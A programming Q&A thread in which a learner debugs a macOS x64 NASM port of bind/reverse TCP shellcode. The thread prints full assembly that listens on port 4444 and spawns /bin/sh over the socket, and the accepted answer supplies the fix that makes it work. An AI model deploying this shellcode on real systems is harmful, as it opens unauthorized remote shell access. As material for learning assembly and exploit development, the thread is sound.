# osx x64 reverse tcp shell code program terminate with success

Tags: macos, assembly, tcp

Been trying to learn some assembler 64 bit on osx and thought a good exercise would be to port a reverse tcp shell code. The program then compiled and linked run fine and listen to the given port 4444, but then I try to connect with `nc -nv 127.0.0.1 4444` the shell_code terminate with success and the response back to nc is: Connection to 127.0.0.1 4444 port [tcp/*] succeeded!

It is compiled and linked with:

```
nasm -g -f macho64 bindshell.s
ld  -arch x86_64 -macosx_version_min 10.7.0 -lSystem -o bindshell bindshell.o
(nasm -v NASM version 2.11.02 compiled on Feb 19 2014)
uname -a
Darwin MacBook-Pro.local 12.4.0 Darwin Kernel Version 12.4.0: Wed May  1 17:57:12 PDT 2013; root:xnu-2050.24.15~1/RELEASE_X86_64 x86_64
```

Been trying to debug it and looked at registers and memory but can't see whats missing, new to 64 bit assembler. The code used is:

```
BITS 64

section .text

global start

start:
    jmp runsh

start_shell:
    dd '/bin//sh', 0

runsh:
  lea r14, [rel start_shell]  ; get address of shell
  mov rax, 0x2000061          ; call socket(SOCK_STREAM, AF_NET, 0);
  mov rdi, 2                  ; SOCK_STREAM = 2 
  mov rsi, 1                  ; AF_NET = 1
  xor rdx, rdx                ; protocol, set to 0
  syscall
  mov r12, rax                ; save socket from call

sock_addr:
  xor r8, r8        ; clear the value of r8
  push r8           ; push r8 to the stack as it's null (INADDR_ANY = 0)
  push WORD 0x5C11  ; push our port number to the stack (Port = 4444)
  push WORD 2       ; push protocol argument to the stack (AF_INET = 2)
  mov r13, rsp      ; Save the sock_addr_in into r13

;bind
  mov rax, 0x2000068    ; bind(sockfd, sockaddr, addrleng);
  mov rdi, r12          ; sockfd from socket syscall
  mov rsi, r13          ; sockaddr 
  mov rdx, 16           ; addrleng the ip address length
  syscall

;listen
  mov rax, 0x200006A  ; int listen(sockfd, backlog);
  mov rdi, r12        ; sockfd
  xor rsi, rsi        ; backlog
  syscall

;accept
  mov rax, 0x200001E  ; int accept(sockfd, sockaddr, socklen);
  mov rdi, r12        ; sockfd
  xor rsi, rsi        ; sockaddr
  xor rdx, rdx        ; socklen
  syscall

dup:
; dup2 for stdin, stdout and stderr
  mov rax, 0x200005A          ; move the syscall for dup2 into rax
  mov rdi, r12                ; move the FD for the socket into rdi
  syscall                     ; call dup2(rdi, rsi)

  cmp rsi, 0x2                ; check to see if we are still under 2
  inc rsi                     ; inc rsi
  jbe dup                     ; jmp if less than 2

;execve
  mov rax, 0x200003B  ; execve(char *fname, char **argp, char **envp);  
  mov rdi, r14        ; set the address to shell
  xor rsi, rsi        
  xor rdx, rdx

run_cmd:  ; using as break point
  syscall
```

Comment: The C interface to `socket` expects the parameters in a different order (`socket(AF_INET, SOCK_STREAM, 0)`). Is this normal?

Comment: Also, if it can make you feel better, the equivalent C code (with the socket call fixed) does the same thing, so the problem is probably more with the shell code than with your assembler version of it.

Comment: man pages for socket says socket(int domain, int type, int protocol)
Maybe it is something with mac osx and /bin/sh that complicates things

Comment: If you read a bit further you'll see that `domain` is one of the PF_\* constants (equivalent to the AF_\* constants), and as far as I know it's the same for all Unices.

Comment: Shouldn't you use db instead of dd to declare the string for the shell path?  i.e. `db '/bin//sh', 0`

Comment: @zneak yes you are correct. Changed to db, sadly the same result.

Comment: Update: Changed the bind/listen/accept to connect and started a `nc -l` the assembler code connected to that server and allowed me to run shell commands. During that exercise I found that rsi in dup: was not preserved during call so used a R register to hold the value and inc that.

But that change did not change the behaviour of the first code, are now trying to experiment with some C to get the first working as it is easier to debug.

Answer (score 2, accepted):

You were so close. The key to your problem is that you're using the `listen` socket when you're trying to `dup`, instead of the `accept` socket. It's the `accept` socket that you really want to communicate on.

For example, this is what you have:

```
;accept
  mov rax, 0x200001E  ; int accept(sockfd, sockaddr, socklen);
  mov rdi, r12        ; sockfd
  xor rsi, rsi        ; sockaddr
  xor rdx, rdx        ; socklen
  syscall

dup:
; dup2 for stdin, stdout and stderr
  mov rax, 0x200005A          ; move the syscall for dup2 into rax
  mov rdi, r12                ; move the FD for the socket into rdi
  syscall                     ; call dup2(rdi, rsi)

  cmp rsi, 0x2                ; check to see if we are still under 2
  inc rsi                     ; inc rsi
  jbe dup                     ; jmp if less than 2
```

This is what you need (look at the line following the first `syscall`):

```
;accept
  mov rax, 0x200001E  ; int accept(sockfd, sockaddr, socklen);
  mov rdi, r12        ; sockfd
  xor rsi, rsi        ; sockaddr
  xor rdx, rdx        ; socklen
  syscall
  mov r12, rax                ; use the accept socket from here

dup:
; dup2 for stdin, stdout and stderr
  mov rax, 0x200005A          ; move the syscall for dup2 into rax
  mov rdi, r12                ; move the FD for the socket into rdi
  syscall                     ; call dup2(rdi, rsi)

  cmp rsi, 0x2                ; check to see if we are still under 2
  inc rsi                     ; inc rsi
  jbe dup                     ; jmp if less than 2
```

Hope that helps!
OJ

Comment: Thx for the help, fixed the problem. Guess I got to blind looking at my own code.